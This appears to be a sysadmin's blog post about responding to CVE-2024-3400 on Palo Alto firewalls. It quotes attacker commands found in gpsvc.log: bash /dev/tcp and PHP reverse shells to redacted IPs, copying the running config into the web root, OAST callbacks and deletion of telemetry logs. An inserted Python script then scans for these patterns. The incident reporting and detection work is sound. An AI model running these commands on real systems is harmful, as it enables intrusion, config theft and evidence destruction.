Palo Alto CVE-2024-3400

April 21, 2024

This Palo Alto vulnerability was a huge headache last week. I guess we have every firewall upgraded to a safe version now (10.2.8-h3). So, the damage from this may have been minor.

I have been following the chatter on Reddit, and Palo Alto Networks has a new tool that will check your Tech Support Files and let you know if your device has been exploited and you have to do a device reset, or if it has not and you just need to upgrade. So far, all of our devices only need an upgrade based on that tool.

I checked the gpsvc.log file and I can see a lot of commands trying to export config files and info, delete files, and attempt to start a reverse shell with "bash -i" and then "php -r".

I redacted the IP addresses.

cp /opt/pancfg/mgmt/saved-configs/running-config.xml /var/appweb/sslvpndocs/global-protect/portal/images/logo-pan-48125a.png
tar -czf /var/appweb/sslvpndocs/global-protect/portal/js/jquery.sex.js /opt/pancfg/mgmt/saved-configs/running-config.xml
rm -rf /var/appweb/sslvpndocs/global-protect/portal/js/jquery.sex.js
rm -rf /opt/panlogs/tmp/device_telemetry/minute/*
echo 123456 > /var/appweb/sslvpndocs/global-protect/portal/js/jquerys.max.js
tar -czf /var/appweb/sslvpndocs/global-protect/portal/js/HMlHkU.js /opt/pancfg/mgmt/saved-configs/running-config.xml
curl rql4aekqvrqe8eizlf16skvjcai36tui.oastify.com
echo 3acf16259def65456fc2a68ab5e10d96$(uname -a) > /var/appweb/sslvpndocs/global-protect/portal/images/paloalto-logo.txt
bash -i >&/dev/tcp/<ip1>/443 0>&1
cp /opt/pancfg/mgmt/saved-configs/running-config.xml /var/appweb/sslvpndocs/global-protect/portal/images/rpp.txt
bash -i >&/dev/tcp/<ip1>/7070 0>&1
bash -i >& /dev/tcp/<ip2>/5000 0>&1
touch /var/appweb/sslvpndocs/global-protect/portal/images/foob2.txt
/usr/bin/php -r '$sock=fsockopen("<ip2>",5000);$proc=proc_open("bash", array(0=>$sock,1=>$sock, 2=>$sock),$pipes);'
php -r '$sock=fsockopen("<ip2>",5000);$proc=proc_open("bash", array(0=>$sock, 1=>$sock,2=>$sock),$pipes);'
touch /var/appweb/sslvpndocs/global-protect/portal/images/foob2.txt
curl obugthbjgbtxngvppgaonru691httfo9n.oast.fun

Attackers are likely using common pentesting tools like Burp Suite to grab session IDs and other information that they could use. This could also have been automated, but it's very difficult to tell.

It's very tough to know if these commands were successful or not without having Palo Alto TAC involved, and TAC is completely swamped with all of this, so we were not able to get much from them so far.
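One way to triage a gpsvc.log excerpt for the patterns listed above, as an added example that is not part of this post or of Palo Alto's tooling: the rule labels, regexes and sample lines are my own construction, and a real gpsvc.log carries timestamps and other fields that a production check would strip or parse first.

```python
import re

# Constructed sample lines modelled on the commands quoted above (not real
# gpsvc.log output; <ip1>/<ip2> are placeholders, as in the post).
SAMPLE_LOG = """\
cp /opt/pancfg/mgmt/saved-configs/running-config.xml /var/appweb/sslvpndocs/global-protect/portal/images/logo-pan-48125a.png
curl rql4aekqvrqe8eizlf16skvjcai36tui.oastify.com
bash -i >&/dev/tcp/<ip1>/443 0>&1
php -r '$sock=fsockopen("<ip2>",5000);$proc=proc_open("bash", array(0=>$sock,1=>$sock,2=>$sock),$pipes);'
rm -rf /opt/panlogs/tmp/device_telemetry/minute/*
touch /var/appweb/sslvpndocs/global-protect/portal/images/foob2.txt
ls /var/log
"""

# Each rule: (label, compiled regex). Labels name the defender-relevant
# behaviour so a hit can feed the reset-vs-upgrade decision.
RULES = [
    ("config-copied-to-webroot",
     re.compile(r"running-config\.xml.*?/var/appweb/sslvpndocs/global-protect/")),
    ("file-written-to-webroot",
     re.compile(r"^(?:cp|tar|echo|touch)\b.*?/var/appweb/sslvpndocs/global-protect/")),
    ("reverse-shell-bash-devtcp", re.compile(r"/dev/tcp/")),
    ("reverse-shell-php", re.compile(r"fsockopen\(.*proc_open\(")),
    ("oast-callback", re.compile(r"\b[a-z0-9]+\.(?:oastify\.com|oast\.fun)\b")),
    ("telemetry-cleanup", re.compile(r"rm -rf /opt/panlogs/tmp/device_telemetry")),
]

def classify(line):
    """Return the labels of every rule the line matches (empty list = not flagged)."""
    return [label for label, rx in RULES if rx.search(line)]

def scan(text):
    """Scan log text line by line; return (line, labels) for flagged lines only."""
    hits = []
    for raw in text.splitlines():
        line = raw.strip()
        labels = classify(line)
        if labels:
            hits.append((line, labels))
    return hits

if __name__ == "__main__":
    for line, labels in scan(SAMPLE_LOG):
        print(", ".join(labels), "|", line[:80])
```

A hit on the reverse-shell or webroot rules is the signal to pull the Tech Support File and escalate rather than just upgrade; absence of hits in this excerpt proves nothing on its own.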

Analysis by Volexity

Since TAC has re-examined these Tech Support files and came back saying that there was no malicious compromise or code execution, they recommended an upgrade only. I really hope those reverse shell attempts failed.